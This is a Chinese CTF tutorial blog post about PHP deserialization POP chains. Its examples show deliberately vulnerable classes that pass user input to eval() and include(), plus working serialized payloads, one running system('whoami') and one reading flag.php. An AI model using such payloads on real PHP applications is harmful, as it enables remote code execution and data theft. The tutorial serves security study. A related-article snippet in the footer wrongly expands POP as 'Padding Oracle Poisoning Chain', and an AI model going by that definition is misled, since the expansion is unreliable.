POP链

于 2024-07-31 09:50:42 发布
阅读量274 收藏 3
点赞数 2
分类专栏: # PHP反序列化 文章标签: 前端 javascript 开发语言 php CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52579508/article/details/140814820
版权

POP链前置知识 成员属性赋值对象

<?php
class index {
    private $test;
    public function __construct(){
        $this->test = new normal();
    }
    public function __destruct(){
        $this->test->action();
    }
}
class normal {
    public function action(){
        echo "please attack me";
    }
}
class evil {
    var $test2;
    public function action(){
        eval($this->test2);
    }
}
unserialize($_GET['test']);
?>

?1 : 如何控制你的对象里的成员属性的对象是那一个 ?
?2: 学习使用反推法

反推法

找到可以利用的点 ,可以执行命令的函数

class evil {
    var $test2;
    public function action(){
        eval($this->test2);
    }

1 : evil 类 ,里面可以执行命令
可以利用的漏洞点在函数eval() (可执行命令 )
2: eval() 会调用 t e s t 2 < b r / > 3 : 往上找看谁会去调用 a c t i o n 方法,因为这里也不存在魔术方法,不会凭空调用 test2<br />3: 往上找 看谁会去调用 action方法 ,因为这里也不存在魔术方法,不会凭空调用 test2<br/>3:往上找看谁会去调用action方法,因为这里也不存在魔术方法,不会凭空调用test2 ,action;

class index {
    private $test;
    public function __construct(){
        $this->test = new normal();
    }
    public function __destruct(){
        $this->test->action();
    }
  class normal {
    public function action(){
        echo "please attack me";
    }

4 : 发现__destruct()方法,
析构函数,在对象的所有引用被删除或者当对象被显式销毁时执行的魔术方法。
反序列化unserialize() 触发魔术方法destruct ,
__destruct 会从$test调用action() ,但是这里调用的是 class normal 类

思路 :

unserialize($_GET[‘test’]);

一定会触发 __destruct()魔法函数 ,然后去调用 action ,但是 他这里调用的class normal 里面的 action(),
然后就是要修改 ,序列化内容 ,让 normal 变成我们想要调用的 calss evil 类里面的action() 方法

思考点 :
如何让$test 调用 evil里的成员方法 action()

解决思路 :
反序列化 成员属性的值,是由我们反序列化字符串的值来决定 的
只需要给 $test 赋值为对象 test = new evil()

构造payload

image.png
然后输出 payload :
image.png

urlencode 编码过的
O%3A5%3A%22index%22%3A1%3A%7Bs%3A11%3A%22%00index%00test%22%3BO%3A4%3A%22evil%22%3A1%3A%7Bs%3A5%3A%22test2%22%3Bs%3A17%3A%22system%28%27whoami%27%29%3B%22%3B%7D%7D

  
O:5:"index":1:{s:11:"indextest";O:4:"evil":1:{s:5:"test2";s:17:"system('whoami');";}}

是可以成功执行的
image.png

魔术方法触发规则

image.png

<?php
highlight_file(__FILE__);
error_reporting(0);
class fast {
    public $source;
    public function __wakeup(){
        echo "wakeup is here!!";
        echo  $this->source;
    }
}
class sec {
    var $benben;
    public function __tostring(){
        echo "tostring is here!!";
    }
}
$b = $_GET['benben'];
unserialize($b);
?>

魔术方法触发前提:魔术方法所在类(或对象)被调用
image.png
看靶场 我这里会报类型错误
image.png
都是不会触发的 ,因为不包含wakeup(),故不会触发
没有字符串输出 unserialize , benben传的值 ,所以不会触发 ,
本地echo 输出
image.png
是可以触发 __tostring()
但是这题要求触发两个 魔法方法怎么触发呢

<?php 
class fast{
    public $source;
}
class sec {
    var $benben;
}
$a = new sec();  
$b = new fast();
//new 两个实例化 

$b -> source=$a; 
// 把$a 对象 赋值给 fast 的  source 触发 wakeup 方法 
//反序列化之后会触发
//echo  __tostring方法
echo  serialize($b); 

?>

O:4:"fast":1:{s:6:"source";O:3:"sec":1:{s:6:"benben";N;}}
image.png

POP链构造 — POC 编写

POP链

在反序列化中,我们能控制的数据就是对象中的属性值(成员变量),所以在PHP反序列化中有一种漏洞利用方法叫"面向属性编程",

即POP( Property Oriented Programming)。
POP链就是利用魔法方法在里面进行多次跳转然后获取敏感数据的一种payload。

例题 :

<?php
//flag is in flag.php
highlight_file(__FILE__);
error_reporting(0);
class Modifier {
    private $var;
    public function append($value)
    {
        include($value);
        echo $flag;
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __toString(){
        return $this->str->source;
    }
    public function __wakeup(){
        echo $this->source;
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

if(isset($_GET['pop'])){
    unserialize($_GET['pop']);
}
?>

POC :
先把 function 全部去掉 只留需要赋值 的
image.png

完整 poc
image.png
这里因为是 private $var 私有的属性 ,要在 Modfier前后加上%00
payload:
?pop=O:4:"Show":2:{s:6:"source";r:1;s:3:"str";O:4:"Test":1:{s:1:"p";O:8:"Modifier":1:{s:13:"%00Modifier%00var";s:8:"flag.php";}}}
image.png
成功输出了flag.php

小龙_(R0 Team)
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
POP学习
blue_fantasy的博客
01-09 685
Text. __wakeup() //使用unserialize时触发 __sleep() //使用serialize时触发 __destruct() //对象被销毁时触发 __call() //当程序调用到当前类中未声明或没权限调用的方法时触发 __callStatic() //在静态上下文中调用不可访问的方法时触发 __get() //当程序调用一个未定义或不可见的成员变量时触发,请求类里不存在的属性则自动触发 __set() //当程序试图写入一个不存在或不可见的成员变量时触发 __isset()
ThinkPHP 6.x反序列化POP(一)1
08-03
《深入理解ThinkPHP 6.x反序列化POP利用》 在网络安全领域,ThinkPHP作为国内广泛应用的PHP框架,其安全问题备受关注。本文将详细探讨ThinkPHP 6.x版本中的一个特定安全问题——反序列化POP的利用,帮助开发者...
POP构造
VZS_0的博客
02-23 1664
wakeup的方法很简单,只需要将反序列化后的字符串,将对象属性数量改大,如,O:3:“fin”:3:{s:1:“a”;//或者env (linux下的命令),向call_user_func(fun类)的$p传递system命令参数。//m类里面没有page这个属性,此时的page会被自动认为是属性/方法,而不是类,触发get。// md5($this->md51) == md5($this->md52) 弱等于。
php反序列化学习(中)--pop的构造
qq_75120258的博客
04-24 877
打开环境,进行代码审计这一题我们需要构造pop,既然要构造pop,我们就要找到头和尾(从尾在到头,一步一步的看,这样就思路清晰了)我们先去找尾,我们需要通过这个file_get_contents()函数来获得flag。
POP实例解析学习
bin789456的博客
11-28 8020
写在前面 POP就是利用魔法方法在里面进行多次跳转然后获取敏感数据的一种payload,实战应用范围暂时没遇到,不过在CTF比赛中经常出现这样的题目,同时也经常与反序列化一起考察,可以理解为是反序列化的一种拓展,泛用性更强,涉及到的魔法方法也更多。 基本魔法方法 我用的代码如下: <?php class A{ public $a="hi"; public $b="no"; function __construct() {
php中的pop构造
blackguest07的博客
03-02 1393
php中反序列化漏洞的原理,pop的构造。
ctf-pop
qq_32445755的博客
05-15 1883
POP就是利用魔法方法在里面进行多次跳转然后获取敏感数据的一种payload,实战应用范围暂时没遇到,不过在CTF比赛中经常出现这样的题目,同时也经常与反序列化一起考察,可以理解为是反序列化的一种拓展,泛用性更强,涉及到的魔法方法也更多。 __sleep() //使用serialize时触发 __destruct() //对象被销毁时触发 __call() //在对象上下文中调用不可访问的方法时触发 __callStatic() //在静态上下文中调用不可访问的方法时触发 __get() //用于从不可
pop php,PHP反序列化入门之寻找POP(一)
weixin_34547167的博客
04-01 729
环境搭建运行环境要求PHP >= 7.1.3OpenSSL PHP ExtensionPDO PHP ExtensionMbstring PHP Extension安装题目环境运行题目代码漏洞点在 routes/web.php 文件中,定义了 web 程序的路由,当我们以 GET 或 POST 方法访问 app/Http/Controllers/EditorController.php 类中...
pop例题
zhhhb1005的博客
05-01 862
目录 例题 流程 exp pop就是利用魔法方法在里面进行多次跳转然后获取敏感数据的一种payload,实战应用范围暂时没遇到,不过在CTF比赛中经常出现这样的题目,同时也经常与反序列化一起考察,可以理解为是反序列化的一种拓展,泛用性更强,涉及到的魔法方法也更多。 例题 Happy New Year~ MAKE A WISH <?php echo 'Happy New Year~ MAKE A WISH<br>'; if(isset($_GET['wish'...
php反序列化漏洞之pop
weixin_60719780的博客
02-08 1854
常用于上层语言构造特定调用的方法,与二进制利用中的面向返回编程(Return-Oriented Programing)的原理相似,都是从现有运行环境中寻找一系列的代码或者指令调用,然后根据需求构成一组连续的调用,最终达到攻击者邪恶的目的。类似于PWN中的ROP,有时候反序列化一个对象时,由它调用的__wakeup()中又去调用了其他的对象,由此可以溯源而上,利用一次次的 " gadget " 找到漏洞点。把魔术方法作为最开始的小组件,然后在魔术方法中调用其他函数(小组件),通过寻找相同名字的函数,再与
CTF-PHP反序列化漏洞4-实例理解POP(经典赛题)
Eason_LYC安全白帽子的成长博客
05-08 2312
悲观者预言失败,十言九中。乐观者创造奇迹,一次即可。一个人的价值,在于他所拥有的。可以不学无术,但不能一无所有!关注WEB安全、网络攻防。我的专栏文章知识点全面细致,逻辑清晰、结合实战,让你在学习路上事半功倍,少走弯路!追求技术至上,这是我们理想中的极乐世界~(关注我即可加入社区)本专栏打破以往CTF速成或就题论题模式。采用。让刚接触CTF的读者真正掌握CTF中各类型知识点,为后续自学或快速刷题备赛,打下坚实的基础~
ThinkPHP 6.x反序列化POP(三)1
08-03
在本文中,我们将探讨ThinkPHP 6.x框架中的一个安全问题,特别是关于反序列化和POP的利用。POP(Padding Oracle Poisoning Chain)是一种利用序列化漏洞进行攻击的技术,通常用于远程代码执行(RCE)。在...
php反序列化pop.html
07-25
php反序列化pop.html
Laravel8反序列化POP分析挖掘 .pdf
09-05
本文将深入探讨Laravel 8反序列化POP(Payload On Purpose)的分析与挖掘。 首先,我们需要了解什么是反序列化。反序列化是将之前通过序列化保存的数据结构恢复为原来的对象或数据的过程。在这个过程中,如果设计...
popModal自动弹框
07-31
"popModal"是一种流行的弹出窗插件,它提供了多种类型的弹出功能,包括弹出窗口、通知弹出、工具提示、模态对话框以及titleModal。这些功能在网页应用和桌面应用中广泛使用,以增强用户体验并提供信息反馈。 1. **...
【分享】前端程序员-技术网站推荐
一位前行者的博客
07-30 388
对于前端开发人员来说,以下是一些推荐的技术网站,这些网站提供了丰富的资源和知识,可以帮助你提升前端开发技能:收集一些 、、 的网站 vite 官方中文文档 element-plus 官方中文文档 pinia 官方中文文档 vue-router 官方中文文档 Tailwind CSS 官方文档 vitest 官方中文文档 es6 中文文档 axios 官方中文文档 vxetable 官方中文文档 lodash 中文文档 echarts 官方中文文档 animat
js、ts、argular、nodejs学习心得
最新发布
07-30 166
工作中需要前端argular开发桌面程序,后端用nodejs开发服务器,商用软件架构。
苍穹外卖浏览器前端界面修改
程序员象漂亮的博客
07-25 261
客户原始方案是期望做一个Spring Boot + Vue的饿了么系统,但时间上太仓促,所以建议选择开源的苍穹外码目作为作业提交。客户接受了建议的方案后,期望对前端页面提出了一些个性化的定制修改。
基于上云api前端开发经验教训(loading...)
IIIIIAN
07-26 431
对于上云api开发学习过程中的错误教训积累总结
php反序列化pop
10-17
PHP反序列化POP是一种利用PHP反序列化漏洞的攻击方式,通过构造恶意的序列化数据,使得反序列化操作在执行过程中触发恶意代码,从而实现攻击目的。POP是一种常见的攻击方式,它利用了PHP魔术方法__wakeup()和__destruct()的特性,通过构造一条对象引用,使得在对象被反序列化时,依次调用每个对象的__wakeup()和__destruct()方法,从而实现攻击目的。 下面是一个简单的POP示例: ``` class A { public $b; function __construct($b) { $this->b = $b; } function __wakeup() { if (isset($this->b)) { unserialize($this->b); } } } class B { public $c; function __construct($c) { $this->c = $c; } function __destruct() { if (isset($this->c)) { unserialize($this->c); } } } class C { public $cmd; function __construct($cmd) { $this->cmd = $cmd; } } $cmd = 'ls -al'; $c = new C($cmd); $b = new B(serialize($c)); $a = new A(serialize($b)); $payload = serialize($a); ``` 在上面的代码中,我们构造了三个类A、B、C,其中类A包含一个成员变量$b,类B包含一个成员变量$c,类C包含一个成员变量$cmd。我们通过构造一个对象引用,使得在对象被反序列化时,依次调用每个对象的__wakeup()和__destruct()方法,最终执行$cmd变量中存储的命令。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值